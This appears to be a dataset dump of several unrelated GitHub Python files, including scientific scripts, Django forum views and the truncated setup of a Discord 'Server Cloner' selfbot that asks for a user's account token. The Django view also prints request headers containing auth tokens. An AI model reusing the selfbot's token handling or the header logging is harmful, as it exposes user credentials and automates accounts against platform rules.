gradient_cells.append((ds_task, f\"{metric} {split}\"))\n else:\n num_metrics_cols += 1\n if metric_params[\"higher_better\"]:\n gradient_cells_reverse.append((ds_task, metric))\n else:\n gradient_cells.append((ds_task, metric))\n column_format += \"l|\" * num_metrics_cols + \"|\"\n print()\n column_format = column_format[:-2]\n\n self.format_color(\n styler=styler,\n gradient_cells=gradient_cells,\n gradient_cells_reverse=gradient_cells_reverse,\n mean_df=mean_df,\n )\n\n latex = styler.to_latex(\n column_format=column_format,\n multicol_align=\"c\",\n convert_css=True,\n position_float=\"centering\",\n hrules=True,\n clines=\"skip-last;data\",\n )\n\n latex = latex.replace(\"_\", \"\\_\")\n latex = latex.replace(\"\\\\centering\", \"\\\\centering \\\\tiny\")\n latex = latex.replace(\n \"{\\cellcolor[HTML]{000000}} \\color[HTML]{F1F1F1} nan±nan\",\n \"{\\cellcolor[HTML]{D3D3D3}}\",\n )\n\n # formatting of hlines (make thicker)\n if self.split_param is None:\n num_cols = len(results_df.columns) + len(results_df.index.names)\n latex = latex.replace(\n f\"\\\\cline{{1-{num_cols}}} \\\\cline{{2-{num_cols}}} \\\\cline{{3-{num_cols}}}\\n\\\\bottomrule\",\n f\"\\\\bottomrule\",\n )\n latex = latex.replace(\n f\"\\\\cline{{1-{num_cols}}} \\\\cline{{2-{num_cols}}} \\\\cline{{3-{num_cols}}}\",\n f\"\\\\cmidrule[2pt]{{1-{num_cols}}}\",\n )\n else:\n num_cols = len(results_df.columns) + len(results_df.index.names)\n latex = latex.replace(\n f\"\\\\cline{{1-{num_cols}}} \\\\cline{{2-{num_cols}}} \\\\cline{{3-{num_cols}}} \\\\cline{{4-{num_cols}}}\\n\\\\bottomrule\",\n f\"\\\\bottomrule\",\n )\n latex = latex.replace(\n f\"\\\\cline{{1-{num_cols}}} \\\\cline{{2-{num_cols}}} \\\\cline{{3-{num_cols}}} \\\\cline{{4-{num_cols}}}\",\n f\"\\\\cmidrule[1.5pt]{{1-{num_cols}}} \\\\morecmidrules \\\\cmidrule[1.5pt]{{1-{num_cols}}}\",\n )\n latex = latex.replace(\n f\"\\\\cline{{2-{num_cols}}} \\\\cline{{3-{num_cols}}} \\\\cline{{4-{num_cols}}}\",\n f\"\\\\cmidrule[2pt]{{2-{num_cols}}}\",\n )\n print(latex)\n return\n\n\n@hydra.main(config_path=\"../configs\", config_name=\"table_config_gta\", version_base=None)\ndef main(table_config):\n table = DsTaskTable(table_config)\n mean_df, std_df = table.create()\n table.to_latex(mean_df, std_df)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"KOFRJO/values","sub_path":"evaluation/visualization/ds_task_table.py","file_name":"ds_task_table.py","file_ext":"py","file_size_in_byte":20874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34963060978","text":"what=int(input(\"1.usd to inr\\n2.inr to usd\\nenter here:- \"))\r\nus=73.18\r\ninr1 = 0.013\r\nif what== 1:\r\n inr = int(input(\"How much do you want to convert?\\nEnter here-:\\n\"))\r\n print(\"INR =\", inr*us)\r\n\r\nelif what==2:\r\n usd = int(input(\"How much do you want to convert?\\nEnter here-:\\n\")) \r\n print(\"USD = \", usd*inr1)\r\n\r\nelse:\r\n print(\"Invalid Input\")","repo_name":"immortalkavyansh/Python-Kavyansh","sub_path":"python projects/currency converter.py","file_name":"currency converter.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40101808450","text":"import FWCore.ParameterSet.Config as cms\nfrom PhysicsTools.PatAlgos.patInputFiles_cff import filesRelValTTbarPileUpGENSIMRECO\nimport Utilities.General.cmssw_das_client as cmssw_das_client\n#from pdb import set_trace\n\n######\n#\n# Ideally to be used, unfortunately sample is not at CERN\n#\n# from PhysicsTools.PatAlgos.tools.cmsswVersionTools import pickRelValInputFiles\n# filesRelValTTbarPileUpGENSIMRECO = cms.untracked.vstring(\n# pickRelValInputFiles( cmsswVersion = 'CMSSW_9_2_3'\n# , relVal = 'RelValTTbar_13'\n# , globalTag = 'PUpmx25ns_92X_upgrade2017_realistic_v2_earlyBS2017'\n# , dataTier = 'GEN-SIM-RECO'\n# , maxVersions = 1\n# , numberOfFiles = 1\n# , useDAS = True\n# )\n# )\n\ndef add_rawRelVals(process): \n query='dataset file=%s' % process.source.fileNames[0]\n dataset = cmssw_das_client.get_data(query, limit = 0)\n if not dataset:\n raise RuntimeError(\n 'Das returned no dataset parent of the input file: %s \\n'\n 'The parenthood is needed to add RAW secondary input files' % process.source.fileNames[0]\n )\n raw_dataset = dataset['data'][0]['dataset'][0]['name'].replace('GEN-SIM-RECO','GEN-SIM-DIGI-RAW-HLTDEBUG')\n raw_files = cmssw_das_client.get_data('file dataset=%s' % raw_dataset, limit=0)['data']\n \n if not raw_files:\n raise RuntimeError('No files found belonging to the GEN-SIM-DIGI-RAW-HLTDEBUG sample!')\n\n #convert from unicode into normal string since vstring does not pick it up\n raw_files = [str(i) for i in raw_files]\n process.source.secondaryFileNames = cms.untracked.vstring(*raw_files)\n return process\n\nprocess = cms.Process('JustATest')\nprocess.load('Configuration.StandardSequences.MagneticField_cff')\nprocess.load(\"Configuration.Geometry.GeometryRecoDB_cff\")\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'auto:phase1_2017_realistic')\n\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.TFileService = cms.Service( \n \"TFileService\",\n fileName = cms.string( 'FIXME' ),\n closeFileFast = cms.untracked.bool(True) \n ) \n\n## Maximal Number of Events\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(10) )\nprocess.source = cms.Source (\n \"PoolSource\",\n fileNames = filesRelValTTbarPileUpGENSIMRECO\n )\n\nprocess.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1\n\nprocess.options = cms.untracked.PSet(\n Rethrow = cms.untracked.vstring('OtherCMS', \n 'StdException', \n 'Unknown', \n 'BadAlloc', \n 'BadExceptionType', \n 'ProductNotFound', \n 'DictionaryNotFound', \n 'InsertFailure', \n 'Configuration', \n 'LogicError', \n 'UnimplementedFeature', \n 'InvalidReference', \n 'NullPointerError', \n 'NoProductSpecified', \n 'EventTimeout', \n 'EventCorruption', \n 'ScheduleExecutionFailure', \n 'EventProcessorFailure', \n 'FileInPathError', \n 'FileOpenError', \n 'FileReadError', \n 'FatalRootError', \n 'MismatchedInputFiles', \n 'ProductDoesNotSupportViews', \n 'ProductDoesNotSupportPtr', \n 'NotFound')\n)\n","repo_name":"cms-sw/cmssw","sub_path":"CalibTracker/SiStripCommon/python/shallowTree_test_template.py","file_name":"shallowTree_test_template.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":985,"dataset":"github-code","pt":"50"} +{"seq_id":"32377139853","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef dBm2mV(pwr):\n return 1000*np.sqrt(0.1*(10**(pwr/10.0)))\n \n\n\nlna = {0:3,1:17,2:21}\nmxr = {0:3,1:11,2:12,3:13,4:14,5:15,6:16,7:17,8:18,9:19,10:20,11:21,12:22,13:23,14:24,15:25,16:26}\ntia = {0:-6,1:0}\nlpf = np.arange(0,25,1)\n\nprint('Gain table')\nprint('GT idx\\t','LNA gain\\t','Mxr gain\\t','TIA gain\\t','LPF gain\\t')\n\nappg_lna = np.zeros(77)\nappg_mxr = np.zeros(77)\nappg_tia = np.zeros(77)\nappg_lpf = np.zeros(77)\n\n#lna bypass region\nappg_lna[5:19] = 0\nappg_mxr[5:19] = 0\nappg_mxr[5:19] = 0\nappg_lpf[5:19] = np.arange(0,14,1)\n\n#High rssi region\nappg_lna[34:40] = 1\nappg_mxr[34:40] = 5\nappg_tia[34:40] = 0\nappg_lpf[34:40] = np.arange(3,9,1)\n\nappg_lna[30:34] = 1\nappg_mxr[30:34] = np.arange(1,5,1)\nappg_tia[30:34] = 0\nappg_lpf[30:34] = 3\n\nappg_lna[19:30] = 1\nappg_mxr[19:30] = 0\nappg_tia[19:30] = 0\nappg_lpf[19:30] = np.arange(0,11,1)\n\n# Mid rssi region\nappg_lna[40:62] = 1\nappg_mxr[40:62] = 5\nappg_tia[40:62] = 1\nappg_lpf[40:62] = np.arange(3,25,1)\n\n# Low rssi region\nappg_lna[62:73] = 1\nappg_mxr[62:73] = np.arange(6,17,1)\nappg_tia[62:73] = 1\nappg_lpf[62:73] = 24\n\nappg_lna[73:78] = 2\nappg_mxr[73:78] = 16\nappg_tia[73:78] = 1\nappg_lpf[73:78] = np.arange(21,25,1)\n\n\n\nfor i in range(77):\n total_gain = lna[int(appg_lna[i])] +mxr[int(appg_mxr[i])] + tia[int(appg_tia[i])] +lpf[int(appg_lpf[i])]\n print(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\".format(i,lna[appg_lna[i]],mxr[int(appg_mxr[i])],tia[appg_tia[i]],lpf[int(appg_lpf[i])],total_gain))\n\npwr_max = -5 \nLMT_thresh = 126\nADC_thresh = 178\nclip1 = [2,16,1,24,76]\nclip2 = [1,16,1,24,72]\nclip3 = [1,5,1,24,61]\nclip4 = [1,5,0,8,39]\nclip5 = [1,0,0,10,29]\nclip6 = [0,0,0,13,18]\n\ndef agcCalcs(pwr_in,clip):\n wb_det = 0\n nb_det = 0\n pwr1 = pwr_in + lna[int(clip[0])] + mxr[int(clip[1])] + tia[int(clip[2])]\n pwr2 = pwr1 + lpf[int(clip[3])]\n if dBm2mV(pwr1) > LMT_thresh:\n wb_det = 1\n if dBm2mV(pwr2) > ADC_thresh:\n nb_det = 1\n return wb_det,nb_det\n \ndef agcClips(pwr_in):\n clip_whr = clip1\n clip_bucket = 1\n wb_det,nb_det = agcCalcs(pwr_in,clip_whr)\n #print(wb_det,nb_det,'clip1')\n if wb_det == 1 or nb_det == 1:\n clip_whr = clip2\n clip_bucket = 2\n wb_det,nb_det = agcCalcs(pwr_in,clip_whr)\n #print(wb_det,nb_det,'clip2')\n if wb_det == 1 or nb_det == 1:\n clip_whr = clip3\n clip_bucket = 3\n wb_det,nb_det = agcCalcs(pwr_in,clip_whr)\n #print(wb_det,nb_det,'clip3')\n if wb_det == 1 or nb_det == 1:\n clip_whr = clip4\n clip_bucket = 4\n wb_det,nb_det = agcCalcs(pwr_in,clip_whr)\n #print(wb_det,nb_det,'clip4')\n if wb_det == 1 or nb_det == 1:\n clip_whr = clip5\n clip_bucket = 5\n wb_det,nb_det = agcCalcs(pwr_in,clip_whr)\n #print(wb_det,nb_det,'clip5')\n if wb_det == 1 or nb_det == 1:\n clip_whr = clip6\n clip_bucket = 6\n wb_det,nb_det=agcCalcs(pwr_in,clip_whr)\n #print(wb_det,nb_det,'clip6')\n return clip_whr,clip_bucket\n \ndef agcSelGain(pwr_in,clip_whr,clip_bucket):\n sel_gain = np.zeros(5)\n pwr_est = pwr_in + lna[clip_whr[0]] + mxr[clip_whr[1]] + tia[clip_whr[2]] + lpf[clip_whr[3]]\n #print(clip_whr,clip_bucket,pwr_est)\n idx = clip_whr[4] + pwr_max - pwr_est \n sel_gain[0] = appg_lna[idx]\n sel_gain[1] = appg_mxr[idx]\n sel_gain[2] = appg_tia[idx]\n sel_gain[3] = appg_lpf[idx]\n return sel_gain\n \n \nlna_gain = np.zeros(np.size(appg_lna))\nmxr_gain = np.zeros(np.size(appg_mxr))\ntia_gain = np.zeros(np.size(appg_tia))\nlpf_gain = np.zeros(np.size(appg_lpf))\npwr_vals = np.zeros(np.size(appg_lna))\n\n\n\npwr_in = -76\nclip_whr,clip_bucket = agcClips(pwr_in)\nsel_gain =agcSelGain(pwr_in,clip_whr,clip_bucket)\n#print(lpf[int(sel_gain[3])] \n\ncnt = 0\nwhile pwr_in <= pwr_max:\n clip_whr,clip_bucket = agcClips(pwr_in)\n sel_gain =agcSelGain(pwr_in,clip_whr,clip_bucket)\n pwr_vals[cnt] = pwr_in\n lna_gain[cnt] = lna[int(sel_gain[0])]\n mxr_gain[cnt] = mxr[int(sel_gain[1])]\n tia_gain[cnt] = tia[int(sel_gain[2])]\n lpf_gain[cnt] = lpf[int(sel_gain[3])]\n pwr_in = pwr_in + 1\n cnt = cnt + 1\n \nplt.subplot(4,1,1)\nplt.plot(pwr_vals,lna_gain)\n\nplt.subplot(4,1,2)\nplt.plot(pwr_vals,mxr_gain)\n\nplt.subplot(4,1,3)\nplt.plot(pwr_vals,tia_gain)\n\nplt.subplot(4,1,4)\nplt.plot(pwr_vals,lpf_gain)\n\nplt.show()\n\n","repo_name":"lmodur/Hello-gnuradio","sub_path":"rxagc.py","file_name":"rxagc.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"19528761038","text":"# -*- coding:utf-8 -*-\n\nimport pcl\nimport numpy as np\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.metrics import r2_score, mean_squared_error, mean_absolute_error\nfrom viewers import *\nfrom filters import *\n\n\ndef read_p(p_path='pcd/pointcloud.csv'):\n '''\n read point cloud from csv\n args:\n p_path: csv file path\n\n return:\n p_min: min value of x,y,z\n p_np: numpy point clouds data\n '''\n p_np = np.genfromtxt(p_path, delimiter=',')\n p_min = p_np.min(axis=0).astype('int') # [396907, 3402527, 494]\n p_np = p_np - p_min # 移动坐标系,便于计算\n return p_min, p_np\n\n\ndef d_r(p):\n '''\n Compute the Radius and Density threshold of DBSCAN.\n '''\n d = []\n for i in range(p.shape[1]):\n min_i = p[:,i].min()\n max_i = p[:,i].max()\n d.append(max_i - min_i)\n d = np.array(d)\n r = np.sqrt(np.power(d[0:2], 2).sum())/30.0\n return r, d\n\n\ndef xy_seg(p, r, tree_points=15):\n '''\n xy plane segmentation\n args: \n p: point cloud\n r: Radius of DBSCAN\n tree_points: Density threshold of DBSCAN\n return:\n DBSCAN segmentation results\n '''\n clustering = DBSCAN(eps=r, min_samples=9).fit(p[:,0:2])\n labels = clustering.labels_\n t_labels = np.unique(labels)\n trees = []\n for label in t_labels:\n sp = p[labels==label, :]\n if label == -1:\n continue\n if sp.shape[0] >= tree_points:\n trees.append(sp)\n return np.array(trees)\n\n\ndef refinement(trees, r, tree_points=15):\n '''\n use xy plane segmentation again to refine the results.\n '''\n r_trees = []\n for i,tree in enumerate(trees):\n tree2 = h_filter(tree, h_factor=0.5)\n t_pl = xy_seg(tree2, r, tree_points=tree_points)\n if len(t_pl) > 1:\n print(\"No. {} tree refine to {} trees\".format(i, len(t_pl)))\n for t in t_pl:\n r_trees.append(t)\n else:\n r_trees.append(tree2)\n return np.array(r_trees)\n\n\ndef k_nearest(p, xyz, K=100):\n \"\"\"\n Find the K points closest to the point(xyz) in the point cloud(p).\n \"\"\"\n xyz = np.array(xyz).reshape(1,3).astype(np.float32)\n p = pcl.PointCloud(p)\n kdtree = p.make_kdtree_flann() # create a kdtree\n s_point = pcl.PointCloud(xyz)\n [ind, sqdist] = kdtree.nearest_k_search_for_cloud(s_point, K)\n \n # compute the Mean value of z-dim\n h = 0.0 \n for i in range(0, ind.size):\n h += p[ind[0][i]][2]\n h = 1.0*h/(K)\n return ind, h\n\n\ndef tree_height(tree, p):\n x, y = tree[:,0].mean(),tree[:,1].mean()\n z = tree[:,2].min()\n h = tree[:,2].max()-tree[:,2].min()\n p_top = [x, y, z+h]\n p_low = [x,y, z-0.9*h]\n _, h_top = k_nearest(p, p_top, K=100)\n _, h_low = k_nearest(p, p_low, K=200)\n return h_top - h_low\n\n\nif __name__ =='__main__':\n h_tree_gt = [15.4, 3.6, 17.2, 17.2, 17.1, 4.0, 4.1, 5.9, 17.5] #ground truth(tree height)\n p_min, p64 = read_p(p_path='pcd/pointcloud.csv')\n p32 = voxel(p=p64, d=1) # voxel grid filter\n r, d = d_r(p32)\n t_pl = xy_seg(p32, r=r, tree_points=18)\n\t\n # refinement\n r_trees = refinement(t_pl, r, tree_points=15) # tree points\n\t\n\t# plot results\n tree_fig = plot_3d(t_pl[0])\n tree_fig.write_image(\"images/tree1.svg\")\n fig1 = plot_clustering(t_pl, is_show=True)\n fig2 = plot_clustering(r_trees, is_show=True)\n fig1.write_image(\"images/fig1.png\")\n fig2.write_image(\"images/fig2.png\")\n\n # tree height (using K-Nearest)\n h_trees=[]\n p3 = p64.astype(np.float32)\n for tree in r_trees:\n h = tree_height(tree, p3) \n h_trees.append(h)\n print(\"trees height:{}\".format(h_trees))\n\t\n # Results Evaluation\n mse = mean_squared_error(h_tree_gt, h_trees, squared=True)\n rmse = mean_squared_error(h_tree_gt, h_trees, squared=False)\n r2 = r2_score(h_tree_gt, h_trees) \n mae = mean_absolute_error(h_tree_gt, h_trees)\n print(\"mse: {}, rmse: {}, mae: {}, r2: {}, \".format(mse, rmse, mae, r2))\n\n\"\"\"\ntrees height:[15.909102935791015, 3.1540063476562503, 18.26805191040039, 16.948209381103517, 17.655261840820312, 4.076800079345703, 3.920495758056641, 6.537965545654297, 17.11969161987305, 1.4795011901855473]\nmse: 0.28447775273413833, rmse: 0.5333645589408227\n\"\"\"","repo_name":"yzfly/SimpleTreeHeight","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"50"} +{"seq_id":"5231760660","text":"#%%\n# Write your revised and debugged version of the code here.\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport trading.data as data\nimport trading.process as process\nimport trading.indicators as indicators\nimport trading.strategy as strategy\nimport trading.performance as tp\nimport os\n\n# first use the get_data function to read txt file\nsim_data = data.get_data('read',r'stock_data_5y.txt')\n\n# extract the initial price for each stock\ninit_price = sim_data[1,:]\n\n# From the question, here, we extract the stock whose initial prices are near to 100, 120\nindex = [np.argmin(np.abs(init_price-100)),np.argmin(np.abs(init_price-120)),\nnp.argmin(np.abs(init_price-400)),np.argmin(np.abs(init_price-250)),np.argmin(np.abs(init_price-300))]\nstock_price = sim_data[1:,index]\n\nN = stock_price.shape[1] # here the N is the number of our available stocks\nportfolio = process.create_portfolio([5000]*N,stock_price,20, ledger = 'ledger.txt')\n\nstock_prices = data.get_data('read', r'stock_data_5y.txt')\nstock = stock_prices[:, 2]\n# [section 3] test for moving average\nMA_1 = indicators.moving_average(stock, n=100)\nMA_2 = indicators.moving_average(stock, n=30)\nMA_3 = indicators.moving_average(stock, n=3, weights=[0.4, 0.5, 0.1])\n# draw the diadram of 3 tests\nplt.figure(1)\nax = plt.gca()\nax.plot(stock[-2*365:],label = r'stock price')\nax.plot(MA_1, label = r'period = 200')\nax.plot(MA_2, label = r'period = 30')\nax.plot(MA_3, label = r'weighted')\nax.legend()\nplt.show()\n\n#%%\nOSC_1 = indicators.oscillator(stock,n=7)\nOSC_2 = indicators.oscillator(stock,n=7,osc_type='RSI')\nOSC_3 = indicators.oscillator(stock,n=30)\nplt.figure(2)\nax = plt.gca()\nax.set_ylim(0,1.25)\nax.plot(OSC_1, label = r'period = 7')\nax.plot(OSC_2, label = r'osc_type is\"RSI\"')\nax.plot(OSC_3, label = r'period = 30')\nax.legend()\nplt.show()\n\n#%%\nif os.path.exists('ledger_random.txt'):\n os.remove('ledger_random.txt')\nif os.path.exists('ledger_crossing.txt'):\n os.remove('ledger_crossing.txt')\nif os.path.exists('ledger_momentum.txt'):\n os.remove('ledger_momentum.txt')\nif os.path.exists('ledger_momentum_RSI.txt'):\n os.remove('ledger_momentum_RSI.txt')\nstock = stock.reshape(stock.shape[0],1)\nstrategy.random(stock)\nstrategy.crossing_averages(stock)\nstrategy.momentum(stock)\nstrategy.momentum(stock,osc_type='RSI',ledger='ledger_momentum_RSI.txt')\nresult_random,portfolio_random = tp.read_ledger('ledger_random.txt')\nresult_crossing,portfolio_crossing = tp.read_ledger('ledger_crossing.txt')\nresult_momentum,portfolio_momentum = tp.read_ledger('ledger_momentum.txt')\nresult_momentum_RSI,portfolio_momentum_RSI = tp.read_ledger('ledger_momentum_RSI.txt')","repo_name":"huwenhan-create/finance_tool","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"37628374929","text":"from typing import Dict\nfrom django.contrib.auth.models import User\nfrom django.db.models import query\nfrom django.http.response import Http404, HttpResponse\nfrom django.shortcuts import render, get_object_or_404\nfrom rest_framework import viewsets\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .models import Comment, Thread, UserProfile, Post\nfrom .serializers import CommentSerializer, PostListSerializer, PostDetailSerializer, ThreadDetailSerializer, ThreadSerializer, UserProfileSerializer\nfrom rest_framework.permissions import AllowAny, IsAdminUser, IsAuthenticatedOrReadOnly\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.exceptions import AuthenticationFailed\nfrom rest_framework import mixins\nfrom .permission import IsAdminOrReadOnly\nfrom rest_framework.decorators import action, permission_classes\nfrom rest_framework.reverse import reverse\nfrom rest_framework import status\nfrom django.http.request import QueryDict\nfrom django.db.models import Max\n\n# Create your views here.\n\n\"\"\"\nsandbox viewset\n\"\"\"\n\"\"\"\nclass SandBoxViewset(mixins.RetrieveModelMixin, mixins.ListModelMixin, viewsets.GenericViewSet):\n queryset=UserProfile.objects.all()\n serializer_class=UserProfileSerializer\n permission_classes=[AllowAny]\n\n def list(self, request, *args, **kwargs):\n if request.auth:\n print(\"request auth\")\n else:\n print(\"unknow user\")\n\n if \"Authorization\" in request.COOKIES:\n token = request.COOKIES[\"Authorization\"]\n print(token)\n else:\n response = HttpResponse(status=status.HTTP_200_OK, content={\"detail\": \"set token\"})\n testingToken = \"testing token\"\n response.set_cookie(\"Authorization\", \"Token %s\"%(testingToken))\n return response\n\n return Response({\"detail\": \"testint sandbox\"}, status=status.HTTP_200_OK)\n\"\"\"\n\n\n\n\"\"\"\nAuth\nThis class is inherit from ObtainAuthToken, \nthe parent class included a view for \"post\" method for login (post with body object, which contain username and password)\n\nThis child class add get method for verifying token (get with {Authorization: token} headers)\nnot sure using \"get\" method is right for this use, subject to change\n\n\"\"\"\nclass CustomObtainAuthToken(ObtainAuthToken):\n # prevent return 403, which lead to signin dialog when using browser\n def get_invalidTokenResponse(self):\n returnData = {\"Token\": \"Invalid Token\"}\n print(\"return invalid response\")\n return Response(returnData, status=status.HTTP_400_BAD_REQUEST) \n\n # override handle-exception, in order to prevent return 403\n def handle_exception(self, exc):\n if (type(exc) == AuthenticationFailed):\n return self.get_invalidTokenResponse()\n return super().handle_exception(exc)\n\n def get(self, request, format=None):\n print(\"auth token get\")\n if (request.auth):\n user = request.user\n serializers = UserProfileSerializer(user.userprofile)\n return Response(serializers.data, status=status.HTTP_200_OK)\n else:\n return self.get_invalidTokenResponse()\n\n \n\n\"\"\"\nCustomized viewset for userprofile\nIncluded create, retrieve (not one can view the whole userslist, but everyone can signup or view user-detail view)\n\"\"\"\nclass UserProfileViewset(mixins.CreateModelMixin, mixins.RetrieveModelMixin, viewsets.GenericViewSet):\n queryset=UserProfile.objects.all()\n serializer_class=UserProfileSerializer\n permission_classes=[AllowAny]\n\n #create a new view for getting post_set of a user\n @action(detail=True, methods=[\"get\"], url_path=\"postset\", url_name=\"userPostset\")\n def getUserPostSet(self, request, pk=None):\n userprofile = get_object_or_404(UserProfile, pk=pk)\n posts = userprofile.post_set.all()\n serializer = PostListSerializer(posts, many=True, context={\"request\": request})\n returnData = {\n \"name\": userprofile.user.username, \n \"post_set\": serializer.data\n }\n return Response(returnData, status=status.HTTP_200_OK)\n\n\n\"\"\"\nPost viewset (include create post, retrieve post and list)\n\nThis viewset also included a postComment (subjected to be changed) method for leaving comment without selecting the post. \nNot sure this is useful or not, it can be done in the cliend side application\n\"\"\"\nclass PostViewset(mixins.ListModelMixin, mixins.CreateModelMixin, mixins.RetrieveModelMixin, mixins.DestroyModelMixin, viewsets.GenericViewSet):\n queryset=Post.objects.all()\n serializer_class=PostDetailSerializer\n permission_classes=[IsAuthenticatedOrReadOnly]\n\n #change the permission class to admin user only for deleting post\n def get_permissions(self):\n if self.action == \"destroy\":\n destroy_permission_classes = [IsAdminUser]\n return [permission() for permission in destroy_permission_classes]\n else:\n return super().get_permissions()\n\n def list(self, request):\n queryset=Post.objects.all().annotate(latestCommentDate=Max(\"comment__pub_date\")).order_by(\"-latestCommentDate\")\n \n serializer=PostListSerializer(queryset, many=True, context={'request': request})\n return Response(serializer.data)\n \n \n def destroy(self, request, *args, **kwargs):\n return super().destroy(request, *args, **kwargs)\n \n def get_queryset(self):\n posts=Post.objects.all()\n posts.annotate(max_update_time=Max(\"comment__pub_date\")).order_by(\"-max_update_time\")\n return posts\n\n #this view help leaving comment without selecting the post by the user (not sure this is useful or not)\n @action(detail=True, methods=['post'], url_path='cm', url_name='postComment')\n def postComment(self, request, pk=None):\n print(\"headers: \")\n print(request.headers)\n\n post=reverse(\"forumAPI:post-detail\", pk, request=request)\n\n print(\"request data is \")\n print(request.data)\n\n #depend on the type of request.data, add post to the request data (subjected to be changed)\n isQueryDict = isinstance(request.data, QueryDict)\n\n if (not isQueryDict):\n request.data[\"post\"]=post\n else:\n #add post to the request data (not able to find another useful answer)\n request.data._mutable=True\n request.data[\"post\"]=post\n request.data._mutable=False\n #(subject to be changed in the future)\n \n serializer=CommentSerializer(data=request.data, context={'request': request})\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers=self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n\n\"\"\"\nThread ModelViewset\n\nOverrided retrieve (thread-detail) for changing the serializer\nThe list serializer is the 'ThreadSerializer', this serializer is for the list view, it does not include the post_set field\nThe detail serializer includes post_set field\n\"\"\"\nclass ThreadViewset(mixins.ListModelMixin, mixins.CreateModelMixin, mixins.RetrieveModelMixin, viewsets.GenericViewSet):\n queryset=Thread.objects.all()\n serializer_class=ThreadSerializer\n permission_classes=[IsAdminOrReadOnly]\n\n #change the serializer to thread detail serializer when the view is detail\n def retrieve(self, request, pk=None):\n queryset=Thread.objects.all()\n thread=get_object_or_404(queryset, pk=pk)\n serializer=ThreadDetailSerializer(thread, context={'request': request})\n return Response(serializer.data)\n \n #this is for writing new post in a thread\n @action(detail=True, methods=[\"post\"], url_path=\"p\", url_name=\"writePost\", permission_classes = [IsAuthenticatedOrReadOnly])\n def writePost(self, request, pk=None):\n thread=reverse(\"forumAPI:thread-detail\", pk, request=request)\n\n print(request.data)\n\n isQueryDict = isinstance(request.data, QueryDict)\n\n if (not isQueryDict):\n request.data[\"thread\"]=thread\n else:\n #add thread to the request data (not able to find another useful answer)\n request.data._mutable=True\n request.data[\"thread\"]=thread\n request.data._mutable=False\n #(subject to be changed in the future)\n\n serializer=PostDetailSerializer(data=request.data, context={'request': request})\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers=self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n\"\"\"\nComment Viewset\nThis viewset include create and retrieve, no one can read the comment list for all comment\n\n\"\"\"\nclass CommentViewset(mixins.CreateModelMixin, mixins.RetrieveModelMixin, viewsets.GenericViewSet):\n queryset=Comment.objects.all()\n serializer_class=CommentSerializer\n\n\n\n","repo_name":"xxki99/Forum_Django-React","sub_path":"forum_backend/backend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27863233767","text":"import os\r\nimport discord\r\nfrom discord.ext import commands\r\nimport asyncio \r\nimport logging\r\nimport random \r\nfrom colorama import init\r\nfrom colorama import Fore, Style\r\nimport requests\r\nimport json\r\nimport datetime\r\nimport random\r\nimport threading\r\nimport random\r\nimport time\r\nimport threading\r\n\r\ninit()\r\nos.system(\"cls\" or \"clear\")\r\n\r\nprint(' ,---. ,-----.,--. ') #per cambiare font/scritta --> https://devops.datenkollektiv.de/banner.txt/index.html\r\nprint(\"' .-' ,---. ,--.--.,--. ,--.,---. ,--.--. ' .--./| | ,---. ,--,--, ,---. ,--.--.\")\r\nprint(\"`. `-.| .-. :| .--' \\ `' /| .-. :| .--' | | | || .-. || \\ .-. :| .--'\")\r\nprint(\".-' \\ --.| | \\ / \\ --.| | ' '--'\\| |' '-' '| || \\ --.| | \")\r\nprint(\"`-----' `----'`--' `--' `----'`--' `-----'`--' `---' `--''--'`----'`--'\", '{}{} V1.0 {}'.format(Fore.RESET, Fore.RED, Fore.RESET)) #versione del Selfbot\r\nprint(\" {}{}[ {}\".format(Fore.RESET, Fore.RED, Fore.RESET),end=\"\")\r\nprint(\"{}{}Coded BY Nico{}\".format(Fore.RESET, Fore.GREEN, Fore.RESET),end=\"\")\r\nprint(\"{}{} ]{}\".format(Fore.RESET, Fore.RED, Fore.RESET),\"\\n\\n\")\r\n\r\ntoken = input('{}\\n[>] {} TOKEN: {}'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET))\r\nprefix = input('{}\\n[>] {} PREFIX: {}'.format(Fore.RESET, Fore.LIGHTMAGENTA_EX, Fore.RESET))\r\nclient = commands.Bot(command_prefix=prefix, case_insensitive=True,\r\n self_bot=True)\r\n\r\nclient.remove_command('help')\r\nheader = {\"Authorization\": f'Bot {token}'}\r\nos.system('cls' if os.name == 'nt' else 'clear')\r\nos.system('cls' if os.name == 'nt' else 